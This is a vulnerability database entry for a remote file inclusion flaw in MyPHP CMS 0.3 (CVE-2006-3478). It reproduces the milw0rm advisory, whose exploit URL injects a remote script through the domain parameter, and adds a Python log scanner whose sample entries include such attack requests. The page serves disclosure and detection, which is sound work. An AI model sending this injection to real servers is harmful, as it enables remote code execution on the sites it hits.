CVE-2006-3478
CVSS 7.5
Published: 2006-07-10 16:05:00
Last revised: 2011-03-07 21:38:43

[Original] PHP remote file inclusion vulnerability in styles/default/global_header.php in MyPHP CMS 0.3 and earlier, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the domain parameter.


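[CNNVD] MyPHP CMS 'global_header.php' Remote File Inclusion Vulnerability (CNNVD-200607-123)

         MyPHP CMS is an open-source content management system based on PHP.
         MyPHP CMS has an input validation vulnerability in its implementation; a remote attacker may exploit it to execute arbitrary commands on the server.
         The global_header.php file in MyPHP CMS does not properly check and filter the $domain variable; if register_globals=on, a remote attacker can execute arbitrary commands using a simple PHP code injection script.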

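- CVSS (Base Score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: PARTIAL [Information disclosure is likely]
Integrity impact: PARTIAL [System files may be modified]
Availability impact: PARTIAL [May cause degraded performance or interrupted access to resources]
Attack complexity: LOW [No access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [Exploitation requires no authentication]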

- CPE (Affected Platforms and Products)

cpe:/a:myphp_cms:myphp_cms:0.3.1
cpe:/a:myphp_cms:myphp_cms:0.3

- OVAL (Technical Details for Detection)

No related OVAL definitions found

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3478
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3478
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200607-123
(Official data source) CNNVD

- Other Links and Resources

http://xforce.iss.net/xforce/xfdb/27538
(UNKNOWN)  XF  myphp-cms-globalheader-file-include(27538)
http://www.vupen.com/english/advisories/2006/2679
(UNKNOWN)  VUPEN  ADV-2006-2679
http://www.securityfocus.com/bid/18834
(UNKNOWN)  BID  18834
http://milw0rm.com/exploits/1983
(UNKNOWN)  MILW0RM  1983

- Vulnerability Information

MyPHP CMS 'global_header.php' Remote File Inclusion Vulnerability
High risk  Input validation
2006-07-10 00:00:00 2006-07-12 00:00:00
Remote

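- Advisories and Patches

        The vendor has not yet provided a patch or upgrade. Users of this software are advised to watch the vendor's home page for the latest version: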
        http://sourceforge.net/projects/myphpcms

- Vulnerability Information (1983)

MyPHP CMS <= 0.3 (domain) Remote File Include Vulnerability (EDBID:1983)
php webapps
2006-07-05 Verified
0 Kw3[R]Ln
N/A
---------------------------------------------------------------------------
MyPHP CMS <= 0.3 (domain) Remote File Include Vulnerabilities
---------------------------------------------------------------------------


Discovered By Kw3[R]Ln [ Romanian Security Team ] : hTTp://RoSecurityGroup.net :
Remote : Yes
Critical Level : Dangerous

---------------------------------------------------------------------------
Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : MyPHP CMS
version : latest version [ 0.3 ]
URL : http://sourceforge.net/projects/myphpcms

------------------------------------------------------------------
Exploit:
~~~~~~~

Variable $domain not sanitized. When register_globals=on an attacker can exploit this vulnerability with a simple php injection script.


# http://www.site.com/[path]/styles/default/global_header.php?installed=23&domain=[Evil_Script]

---------------------------------------------------------------------------

Solution :
~~~~~~~~~

declare variable $domain
---------------------------------------------------------------------------


Shoutz:
~~~~~

# Special greetz to my good friend [Oo]
# To all members of h4cky0u.org ;) and RST [ hTTp://RoSecurityGroup.net ]
---------------------------------------------------------------------------

*/

Contact:
~~~~~~~

Nick: Kw3rLn
E-mail: ciriboflacs[at]YaHoo[dot]Com
Homepage: hTTp://RoSecurityGroup.net
/*

-------------------------------- [ EOF] ----------------------------------

# Further Notes
if ( !isset ( $installed ) )
{
        header ( "Location: install_sql.php" );
}

added installed to the get request for the vulnerability to work correctly.

/str0ke

# milw0rm.com [2006-07-05]
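
For defenders reviewing web server logs, the following is an added example (not part of the advisory or of MyPHP CMS) that flags requests to the global_header.php path named above whose domain parameter carries a URL. The combined access-log format, the scheme watch list, and the sample entries are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script path named in the advisory; the prefix before it depends on the install.
TARGET = "styles/default/global_header.php"
# URL schemes treated as remote include targets (assumed watch list).
SCHEME = re.compile(r"\s*(?:https?|ftps?)://", re.I)
# Request line inside a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_domain_values(line):
    """Return the domain= values in one log line that look like remote URLs."""
    m = REQUEST.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith(TARGET):
        return []
    # parse_qs percent-decodes values, so http%3A%2F%2F... is caught as well.
    values = parse_qs(url.query, keep_blank_values=True).get("domain", [])
    return [v for v in values if SCHEME.match(v)]


def scan(lines):
    """Return (line_number, values) for every log line with a hit."""
    hits = []
    for number, line in enumerate(lines, 1):
        values = suspicious_domain_values(line)
        if values:
            hits.append((number, values))
    return hits


# Constructed sample entries (documentation addresses and hosts, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [05/Jul/2006:10:00:00 +0000] "GET /cms/index.php HTTP/1.1" 200 512',
    '203.0.113.9 - - [05/Jul/2006:10:00:01 +0000] "GET /cms/styles/default/'
    'global_header.php?installed=23&domain=http://files.example/a.txt? HTTP/1.1" 200 90',
    '203.0.113.9 - - [05/Jul/2006:10:00:02 +0000] "GET /cms/styles/default/'
    'global_header.php?installed=23&domain=hTTp%3A%2F%2Ffiles.example%2Fa.txt HTTP/1.1" 200 90',
    '198.51.100.7 - - [05/Jul/2006:10:00:03 +0000] "GET /cms/styles/default/'
    'global_header.php?installed=1&domain=www.example.org HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    for number, values in scan(SAMPLE_LOG):
        print(f"line {number}: domain={values}")
```

With register_globals on, a domain value sent in a POST body or cookie also becomes a global and does not appear in the access log, so this check covers the query string only.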
		

- Vulnerability Information

30929
MyPHP CMS global_header.php domain Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability Description

Unknown or Incomplete

- Timeline

2006-07-05 Unknown
2006-07-05 Unknown

- Solution

Unknown or Incomplete

- Related References

- Vulnerability Author

Unknown or Incomplete
 

 
